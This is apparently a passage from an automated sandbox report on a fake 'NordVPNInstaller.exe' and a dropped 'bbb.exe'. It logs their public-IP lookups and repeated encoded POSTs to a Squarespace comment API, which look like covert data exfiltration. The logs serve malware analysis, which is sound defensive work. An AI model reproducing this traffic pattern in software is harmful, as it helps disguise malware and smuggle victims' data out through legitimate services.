Sep 1, 2024 21:57:12.149200916 CEST	49912	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.149409056 CEST	49912	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.149415016 CEST	443	49912	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.224262953 CEST	443	49911	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.225702047 CEST	49911	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.225716114 CEST	443	49911	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.342546940 CEST	443	49911	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.342725992 CEST	49911	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.342736006 CEST	443	49911	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.470269918 CEST	443	49911	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.470340014 CEST	443	49911	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.470396042 CEST	49911	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.470725060 CEST	49911	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.471455097 CEST	49913	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.471468925 CEST	443	49913	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.471585035 CEST	49913	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.471756935 CEST	49913	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.471766949 CEST	443	49913	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.606300116 CEST	443	49912	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.607861996 CEST	49912	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.607875109 CEST	443	49912	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.746200085 CEST	443	49912	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.759040117 CEST	49912	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.759047985 CEST	443	49912	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.891105890 CEST	443	49912	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.891154051 CEST	443	49912	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.891206980 CEST	49912	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.891550064 CEST	49912	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.892333984 CEST	49914	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.892350912 CEST	443	49914	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.892419100 CEST	49914	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.892637968 CEST	49914	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.892653942 CEST	443	49914	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.939970016 CEST	443	49913	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.977828979 CEST	49913	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.977844954 CEST	443	49913	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.077336073 CEST	443	49913	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.077513933 CEST	49913	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.077522039 CEST	443	49913	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.439611912 CEST	443	49913	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.439672947 CEST	443	49913	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.439719915 CEST	49913	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.440023899 CEST	49913	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.440618038 CEST	49915	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.440638065 CEST	443	49915	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.440697908 CEST	49915	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.440907001 CEST	49915	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.440917969 CEST	443	49915	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.441164970 CEST	443	49914	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.449754953 CEST	49914	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.449768066 CEST	443	49914	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.577831984 CEST	443	49914	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.577985048 CEST	49914	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.577994108 CEST	443	49914	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.731031895 CEST	443	49914	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.731077909 CEST	443	49914	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.731120110 CEST	49914	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.732026100 CEST	49914	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.732839108 CEST	49916	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.732851982 CEST	443	49916	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.732906103 CEST	49916	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.733095884 CEST	49916	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.733103991 CEST	443	49916	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.809993982 CEST	443	49839	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.810064077 CEST	49839	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.901386023 CEST	443	49841	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.901653051 CEST	49841	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.962940931 CEST	443	49915	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:13.965014935 CEST	49915	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:13.965029955 CEST	443	49915	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.097635984 CEST	443	49915	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.097923040 CEST	49915	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.097933054 CEST	443	49915	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.176850080 CEST	443	49916	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.178132057 CEST	49916	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.178145885 CEST	443	49916	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.252490044 CEST	443	49915	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.252547026 CEST	443	49915	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.252593040 CEST	49915	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.252819061 CEST	49915	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.253372908 CEST	49917	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.253384113 CEST	443	49917	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.253448963 CEST	49917	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.253613949 CEST	49917	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.253623962 CEST	443	49917	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.289381981 CEST	443	49916	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.289518118 CEST	49916	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.289525032 CEST	443	49916	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.418020010 CEST	443	49916	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.418066978 CEST	443	49916	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.418128967 CEST	49916	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.418433905 CEST	49916	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.419012070 CEST	49918	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.419022083 CEST	443	49918	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.419183016 CEST	49918	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.425503016 CEST	49918	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.425510883 CEST	443	49918	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.698498011 CEST	443	49917	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.700011969 CEST	49917	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.700026035 CEST	443	49917	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.834408998 CEST	443	49917	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.834543943 CEST	49917	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.834553003 CEST	443	49917	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.882947922 CEST	443	49918	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.886981964 CEST	49918	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.886995077 CEST	443	49918	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.979455948 CEST	443	49917	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.979504108 CEST	443	49917	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.979815960 CEST	49917	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.979825020 CEST	443	49917	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.979852915 CEST	49917	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.979875088 CEST	49917	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.980451107 CEST	49919	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.980473042 CEST	443	49919	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.980969906 CEST	49919	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.981142998 CEST	49919	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.981158972 CEST	443	49919	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:14.995623112 CEST	49841	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:14.995670080 CEST	49839	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:15.022083044 CEST	443	49918	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:15.106967926 CEST	49918	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:15.427998066 CEST	443	49919	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:15.632503033 CEST	443	49919	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:15.632556915 CEST	49919	443	192.168.2.4	198.185.159.177

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 21:54:54.973995924 CEST	51052	53	192.168.2.4	1.1.1.1
Sep 1, 2024 21:54:54.982022047 CEST	53	51052	1.1.1.1	192.168.2.4
Sep 1, 2024 21:55:11.145514965 CEST	59230	53	192.168.2.4	1.1.1.1
Sep 1, 2024 21:55:11.169380903 CEST	53	59230	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 1, 2024 21:54:54.973995924 CEST	192.168.2.4	1.1.1.1	0x9091	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 1, 2024 21:55:11.145514965 CEST	192.168.2.4	1.1.1.1	0x4f7f	Standard query (0)	plantain-elk-b8pt.squarespace.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 1, 2024 21:54:54.982022047 CEST	1.1.1.1	192.168.2.4	0x9091	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 21:54:54.982022047 CEST	1.1.1.1	192.168.2.4	0x9091	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 1, 2024 21:54:54.982022047 CEST	1.1.1.1	192.168.2.4	0x9091	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 1, 2024 21:54:54.982022047 CEST	1.1.1.1	192.168.2.4	0x9091	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 1, 2024 21:54:54.982022047 CEST	1.1.1.1	192.168.2.4	0x9091	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 1, 2024 21:54:54.982022047 CEST	1.1.1.1	192.168.2.4	0x9091	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 1, 2024 21:55:11.169380903 CEST	1.1.1.1	192.168.2.4	0x4f7f	No error (0)	plantain-elk-b8pt.squarespace.com		198.185.159.177	A (IP address)	IN (0x0001)	false
Sep 1, 2024 21:55:11.169380903 CEST	1.1.1.1	192.168.2.4	0x4f7f	No error (0)	plantain-elk-b8pt.squarespace.com		198.185.159.176	A (IP address)	IN (0x0001)	false
Sep 1, 2024 21:55:11.169380903 CEST	1.1.1.1	192.168.2.4	0x4f7f	No error (0)	plantain-elk-b8pt.squarespace.com		198.49.23.176	A (IP address)	IN (0x0001)	false
Sep 1, 2024 21:55:11.169380903 CEST	1.1.1.1	192.168.2.4	0x4f7f	No error (0)	plantain-elk-b8pt.squarespace.com		198.49.23.177	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

plantain-elk-b8pt.squarespace.com

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	132.226.247.73	80	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 21:54:54.994596958 CEST	68	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Sep 1, 2024 21:54:55.660928011 CEST	320	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 19:54:55 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 24573119fb2af50636063e6194fb7ec2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	132.226.247.73	80	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 21:55:23.971085072 CEST	68	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Sep 1, 2024 21:55:25.624087095 CEST	320	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 19:55:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 837cf0d8c37e42e5a65fd3d81029e8ee Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	132.226.247.73	80	1516	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 21:55:32.321491957 CEST	68	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Sep 1, 2024 21:55:32.976727009 CEST	320	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 19:55:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1eee8ade79612f5dbe4e641a9a1131c5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:55:11 UTC	317	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2024-09-01 19:55:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:55:11 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:55:11 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:55:11 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:55:11 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BeONoH9LGCt6YjZmYzU1NjBjY2ZhY2U2MDYwMTUzMjAyN2JlNzcx; Path=/; Secure Set-Cookie: crumb=Bb8jLGqHxOiVYTFmMmU5OWFkY2Y3ZjNlNjRlMTBkNzZhYWZmNmFj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 6VjoBgn4/0dUaA1JJ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bb8jLGqHxOiVYTFmMmU5OWFkY2Y3ZjNlNjRlMTBkNzZhYWZmNmFj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:55:12 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:55:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:55:12 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:55:12 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 63 4a 59 4d 67 4f 75 43 4a 6d 58 58 4a 77 51 4d 6d 66 72 4b 64 4a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjcJYMgOuCJmXXJwQMmfrKdJIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:55:12 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:55:12 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSzXlScWhEzXOTVjMDMxOWJhMDRlOGZkMDUxZDM4OGYxNDczMWUy; Path=/; Secure Set-Cookie: crumb=BfdYeqHzEFJHMDE2YWMyNWZiOTljNDU3MTM4MWY0MWJlYTIxMjhl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: N4Ii3uJi/3ieNvOrP Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfdYeqHzEFJHMDE2YWMyNWZiOTljNDU3MTM4MWY0MWJlYTIxMjhl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:55:13 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 314 Expect: 100-continue
2024-09-01 19:55:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:55:13 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:55:13 UTC	313	OUT	Data Raw: 3d 54 55 43 48 51 44 30 70 74 75 71 6d 75 58 50 48 43 59 69 6e 6d 79 53 38 66 35 50 58 63 45 71 4c 45 25 32 42 48 41 6e 61 76 56 6c 41 76 54 35 38 6e 79 67 58 61 56 2f 56 4d 53 30 32 30 64 71 65 41 61 69 62 6e 41 61 6c 4a 69 33 41 47 43 7a 55 39 51 6f 53 4f 49 52 4f 7a 30 61 2f 30 36 78 61 54 47 48 35 33 2f 37 7a 67 79 70 76 4a 72 6d 6d 6f 4e 45 47 33 6a 72 77 76 6f 36 44 45 71 50 54 61 36 68 38 64 4d 46 4a 35 67 2f 75 5a 78 55 41 25 32 42 73 77 52 46 51 6b 6c 6d 30 25 32 42 31 55 54 4e 6f 45 46 59 77 77 49 57 53 25 32 42 76 38 6a 55 31 37 30 55 72 53 62 74 59 56 43 41 39 6f 54 39 42 37 58 64 51 34 63 79 30 69 61 76 69 63 48 64 57 71 49 25 32 42 41 37 4e 63 74 2f 49 50 55 31 64 41 4c 63 4f 6e 6d 77 75 78 31 50 32 6b 36 52 6d 39 69 4f 4e 64 51 50 4d 69 50 Data Ascii: =TUCHQD0ptuqmuXPHCYinmyS8f5PXcEqLE%2BHAnavVlAvT58nygXaV/VMS020dqeAaibnAalJi3AGCzU9QoSOIROz0a/06xaTGH53/7zgypvJrmmoNEG3jrwvo6DEqPTa6h8dMFJ5g/uZxUA%2BswRFQklm0%2B1UTNoEFYwwIWS%2Bv8jU170UrSbtYVCA9oT9B7XdQ4cy0iavicHdWqI%2BA7Nct/IPU1dALcOnmwux1P2k6Rm9iONdQPMiP
2024-09-01 19:55:13 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:55:13 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BeIw3Vv7Q8WjZWUyNjM0MjNmZjJmMDkxZTkwZjgyYzE2NmZmNTVj; Path=/; Secure Set-Cookie: crumb=Bdp_WmfreG_1ODkyYjZjMTk3ZDBlZTI0Y2UyNzUwMWE2ZGRiNTVk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 2nQvEdn2/sBxSLvnH Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bdp_WmfreG_1ODkyYjZjMTk3ZDBlZTI0Y2UyNzUwMWE2ZGRiNTVk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:55:14 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 578 Expect: 100-continue
2024-09-01 19:55:14 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:55:14 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:55:14 UTC	577	OUT	Data Raw: 3d 53 2f 43 42 25 32 42 38 44 64 37 36 72 57 57 78 34 46 63 53 4b 7a 6d 56 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 4a 6f 39 50 6e 71 58 56 50 33 74 59 59 79 35 65 72 37 73 76 50 53 4b 75 47 68 38 4a 4e 4a 45 48 79 56 77 45 74 78 30 38 42 55 55 49 53 70 77 30 54 45 51 69 25 32 42 67 66 2f 31 46 4b 4a 70 63 56 56 41 52 5a 6b 61 48 42 46 6b 73 73 44 34 75 76 4f 70 7a 69 7a 6b 61 52 71 48 42 50 45 48 5a 43 6b 43 39 2f 72 6f 4b 71 71 74 35 36 54 56 54 72 66 6f 57 6a 2f 74 31 38 69 6a 59 78 4b 41 48 37 45 35 66 31 31 66 41 6d 67 34 4c 53 46 64 35 75 32 68 4f 4f 49 6e 38 4d 47 56 70 48 4f 59 59 75 Data Ascii: 